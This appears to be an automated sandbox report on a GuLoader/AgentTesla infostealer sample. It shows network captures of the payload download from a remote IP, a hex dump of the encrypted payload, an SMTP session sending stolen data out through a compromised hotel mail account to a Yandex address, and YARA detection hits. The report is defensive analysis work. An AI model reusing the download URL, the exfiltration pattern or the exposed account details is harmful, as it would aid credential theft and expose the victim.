                              May 27, 2022 19:41:07.320257902 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320272923 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320286989 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320313931 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.320314884 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320328951 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320343971 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320363998 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320379019 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320393085 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320394993 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.320408106 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320420027 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320477962 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320487022 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.320565939 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.320620060 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.332973003 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.333053112 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.333106995 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.333122015 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.333122969 CEST4975480192.168.11.20185.222.57.79
                              May 27, 2022 19:41:07.333132029 CEST8049754185.222.57.79192.168.11.20
                              May 27, 2022 19:41:07.333273888 CEST4975480192.168.11.20185.222.57.79
                              TimestampSource PortDest PortSource IPDest IP
                              May 27, 2022 19:42:43.874780893 CEST6030353192.168.11.201.1.1.1
                              May 27, 2022 19:42:43.993166924 CEST53603031.1.1.1192.168.11.20
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              May 27, 2022 19:42:43.874780893 CEST192.168.11.201.1.1.10x53c3Standard query (0)mail.parkhotelizmir.comA (IP address)IN (0x0001)
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              May 27, 2022 19:42:43.993166924 CEST1.1.1.1192.168.11.200x53c3No error (0)mail.parkhotelizmir.com45.10.148.33A (IP address)IN (0x0001)
                              • 185.222.57.79
                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.11.2049754185.222.57.7980C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                              TimestampkBytes transferredDirectionData
                              May 27, 2022 19:41:07.264504910 CEST8628OUTGET /SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: 185.222.57.79
                              Cache-Control: no-cache
                              May 27, 2022 19:41:07.278637886 CEST8629INHTTP/1.1 200 OK
                              Date: Fri, 27 May 2022 17:41:06 GMT
                              Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                              Last-Modified: Fri, 27 May 2022 10:16:01 GMT
                              ETag: "36240-5dffb97debf87"
                              Accept-Ranges: bytes
                              Content-Length: 221760
                              Content-Type: application/octet-stream
                              Data Raw: 2d 69 12 93 de 1a 67 e3 7f ae 04 59 ab af ba b8 06 e1 f6 84 da df 3f 2c 16 02 e8 fc a1 c5 39 87 74 e4 ac af 6a 34 a1 e7 b9 d0 4e a1 e7 84 37 d8 ba 27 e1 81 24 67 b7 26 f4 ba 09 0b af 53 6f f8 f2 67 73 50 49 f3 53 fe 8f ec 26 3c 10 58 b5 71 06 a5 a9 38 35 69 c2 0b 32 79 72 74 ac 4c 1e 85 2d cf 2a 1f ac c6 91 e2 4f 84 a7 79 16 00 f6 80 f0 94 53 3e df 03 29 1a e2 0b 43 48 21 e2 18 fb 71 8a 60 18 cf 97 da 5e 1d db 64 6a b6 b8 bf 51 02 36 76 b5 5c 74 da 61 c6 32 f5 29 62 45 50 b5 1f 15 ba c0 8c 4e 65 1b 40 bb fd 0c 09 05 99 ff 30 58 62 16 c0 38 8d 8b d3 da 43 f9 da 0b 0d 32 a6 f0 3b 6c 73 91 b2 1c b3 2d be 2b 0b 90 3a 5d 3d 77 6e f5 86 29 1a 35 17 da 9e 44 81 0a 47 b7 05 4f 5c de c5 99 00 a6 56 1b 7a 63 47 b0 49 ac 96 7d c6 3a 6d fd 67 e9 1a e8 2d 5c 2c 1c 8a 27 b7 4b 21 ca e0 e3 e6 13 f5 6e 0d 51 0b 88 4c 18 8b 84 1c 19 d0 cb f5 dd a7 2a a5 40 64 98 19 9b 84 99 01 8b 7d 33 19 23 48 ea bd 8c f8 be 87 18 9e 9c 52 28 6b 51 f4 8c f4 07 4b 59 58 b3 c4 4d 87 0b 74 70 d1 ff f1 a8 b6 c1 41 c7 26 e1 e7 d9 2a 7e fc 57 9e a6 15 41 49 0d 3e 51 9d 7e 51 ee 48 78 cf a5 65 3a 00 7e d4 d7 a0 f1 8e 43 01 47 0f c8 ac bd 56 7c 94 a0 0c 74 5f ca af 9d 40 47 fd 34 33 5f f9 e0 19 e0 9c 2c ee 1d 06 94 ec 6a 09 99 4a 27 cb 4a 0a 24 90 44 b1 8e dd 9c 8e 93 c4 c4 ca 42 e0 a8 bc f7 80 62 0c c7 e5 b9 1c 2e 7b 04 36 b9 17 9b de 6c fa 1e 8c fd fc 06 c4 f2 60 f6 80 2d 28 8a 38 e4 3c 64 ff b6 5d 3e 03 4b 93 57 9f 6e 1d e3 a7 d6 cd 7f f3 cd 0b 8f 63 e5 eb 23 40 41 1b d1 60 20 33 a1 32 b3 1f fc 4a 86 a1 b7 a1 9a 7d ab f2 bd c6 9e 2c 4d 29 f5 c7 b9 53 93 da 3f d9 09 d6 c3 0d 8a 4d e3 7d a2 6b 47 5d 0b 0c d4 20 87 c6 2c cb 60 89 f5 d9 00 ae 21 f3 7a 1f 53 5f 65 7c 29 fd 5e f1 a1 1b 16 f0 81 86 cb 6f 35 bd 09 ba 13 a8 2e 94 d7 1a 90 05 b0 28 bc c3 13 10 d1 cb 57 fc 2e 16 45 ab 12 c7 35 aa e2 d0 2d 65 c0 f6 d3 ac 36 55 1d 19 69 2b 4f 6d 34 0a c5 5f 3d e0 1d 46 45 f4 0e 77 1d cf b6 68 91 06 f1 78 01 d4 80 a6 f3 78 81 c7 50 f6 27 1c 23 ad 9b 58 93 1c 18 e7 ca 26 fb c1 36 fb 6e e2 5b ee e9 69 bb 0c 46 42 e5 db b3 ff 53 41 3e d7 30 98 21 08 de cb 88 56 c8 3b cc 8c 6a 3a 9d 89 99 6d 3d 40 76 9e 32 00 f4 1a 46 a0 61 2c 5c 88 69 3e 6c 00 90 ef 36 ef c3 69 d6 15 14 5f c3 d7 df 99 37 3e 13 48 35 5d e4 67 88 96 20 9f 85 20 95 4c 40 ed 81 be cb 71 71 ea ee 34 0b 12 0c 22 2a 3c b0 2c bb df 95 18 9d db 23 20 25 78 b3 9c 65 dd 51 84 0b 35 80 ea e0 17 da 67 2e 5a 38 8f 85 1b 05 0c dc 52 7f 03 07 bd c8 75 18 20 3d 5a a8 d3 b6 47 4e c5 51 ed dc ef 15 32 37 4f 24 b7 4f a2 00 46 d8 20 ff 1b 3c 80 0d 53 97 a9 c9 f5 47 6d a7 5a 3a d8 1a ae ab 12 f9 1f c9 b5 61 05 ba 59 78 6e a0 ba f3 6d ff 5e cb 36 37 10 34 5a 82 8c 5e 30 c2 d7 7e ba d5 cb dd fd 53 77 c0 af 46 61 60 57 ea 04 e7 17 23 5d 83 11 91 00 e1 e8 69 67 79 46 c9 d5 24 89 37 f6 84 a6 18 11 7a db bc 8e 8c 88 8e 38 61 c1 83 ad f6 4c 3f 9d 94 de 9d 54 4a f3 57 91 86 ec 26 36 c5 b4 85 73 be 8b a9 38 35 6c c2 0b 63 6f 79 5f b7 4c 19 92 d3 ce 06 1d b4 cd 91 e5 59 7a a6 55 14 17 fd 80 f7 8c ad 3f f3 01 02 18 c9 e8 41 4b 89 f3 18 fb 75 bd c8 16 cf 29 f9 93 3c 70 55 24 7b b1 eb 39 6b 43 56 c5 3f 0d b6 38 bc 5f d2 5d fd 2a 12 d8 73 3e d8 a2 ba c2 11 59 62 c5 98 2c 4a 52 34 de 71 35 2d 71 c5 d6 82 a9 e4 da 43 f3 f0 18 3d 30 f6 99 3b 6c 3f 97 b1 1c 5e
                              Data Ascii: -igY?,9tj4N7'$g&SogsPIS&<Xq85i2yrtL-*OyS>)CH!q`^djQ6v\ta2)bEPNe@0Xb8C2;ls-+:]=wn)5DGO\VzcGI}:mg-\,'K!nQL*@d}3#HR(kQKYXMtpA&*~WAI>Q~QHxe:~CGV|t_@G43_,jJ'J$DBb.{6l`-(8<d]>KWnc#@A` 32J},M)S?M}kG] ,`!zS_e|)^o5.(W.E5-e6Ui+Om4_=FEwhxxP'#X&6n[iFBSA>0!V;j:m=@v2Fa,\i>l6i_7>H5]g L@qq4"*<,# %xeQ5g.Z8Ru =ZGNQ27O$OF <SGmZ:aYxnm^674Z^0~SwFa`W#]igyF$7z8aL?TJW&6s85lcoy_LYzU?AKu)<pU${9kCV?8_]*s>Yb,JR4q5-qC=0;l?^


                              TimestampSource PortDest PortSource IPDest IPCommands
                              May 27, 2022 19:42:44.306915045 CEST5874976345.10.148.33192.168.11.20220-artemis.egegen.com ESMTP Exim 4.95 #2 Fri, 27 May 2022 20:42:44 +0300
                              220-We do not authorize the use of this system to transport unsolicited,
                              220 and/or bulk e-mail.
                              May 27, 2022 19:42:44.307287931 CEST49763587192.168.11.2045.10.148.33EHLO 965969
                              May 27, 2022 19:42:44.369997025 CEST5874976345.10.148.33192.168.11.20250-artemis.egegen.com Hello 965969 [84.17.52.2]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPE_CONNECT
                              250-AUTH PLAIN LOGIN
                              250-STARTTLS
                              250-SMTPUTF8
                              250 HELP
                              May 27, 2022 19:42:44.373267889 CEST49763587192.168.11.2045.10.148.33AUTH login bXVoYXNlYmVAcGFya2hvdGVsaXptaXIuY29t
                              May 27, 2022 19:42:44.436863899 CEST5874976345.10.148.33192.168.11.20334 UGFzc3dvcmQ6
                              May 27, 2022 19:42:44.567787886 CEST5874976345.10.148.33192.168.11.20235 Authentication succeeded
                              May 27, 2022 19:42:44.568514109 CEST49763587192.168.11.2045.10.148.33MAIL FROM:<muhasebe@parkhotelizmir.com>
                              May 27, 2022 19:42:44.630826950 CEST5874976345.10.148.33192.168.11.20250 OK
                              May 27, 2022 19:42:44.631124020 CEST49763587192.168.11.2045.10.148.33RCPT TO:<saleseuropower2@yandex.com>
                              May 27, 2022 19:42:44.799923897 CEST5874976345.10.148.33192.168.11.20250 Accepted
                              May 27, 2022 19:42:44.800266981 CEST49763587192.168.11.2045.10.148.33DATA
                              May 27, 2022 19:42:44.862984896 CEST5874976345.10.148.33192.168.11.20354 Enter message, ending with "." on a line by itself
                              May 27, 2022 19:42:44.865156889 CEST49763587192.168.11.2045.10.148.33.
                              May 27, 2022 19:42:46.252098083 CEST5874976345.10.148.33192.168.11.20250 OK id=1nudz3-0003gS-BW
                              May 27, 2022 19:44:23.833553076 CEST49763587192.168.11.2045.10.148.33QUIT
                              May 27, 2022 19:44:24.099668980 CEST5874976345.10.148.33192.168.11.20221 artemis.egegen.com closing connection

                              Click to jump to process

                              Target ID:1
                              Start time:19:40:39
                              Start date:27/05/2022
                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
                              Imagebase:0x400000
                              File size:658225 bytes
                              MD5 hash:DD43BD8CDC55DD9C8A168F7D5E67DB30
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low

                              Target ID:3
                              Start time:19:40:51
                              Start date:27/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
                              Imagebase:0x260000
                              File size:108664 bytes
                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Target ID:4
                              Start time:19:40:52
                              Start date:27/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
                              Imagebase:0x600000
                              File size:108664 bytes
                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Target ID:5
                              Start time:19:40:52
                              Start date:27/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
                              Imagebase:0xcb0000
                              File size:108664 bytes
                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.19759760809.000000001D7ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.14824947099.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:moderate

                              Target ID:6
                              Start time:19:40:52
                              Start date:27/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff78a640000
                              File size:875008 bytes
                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              No disassembly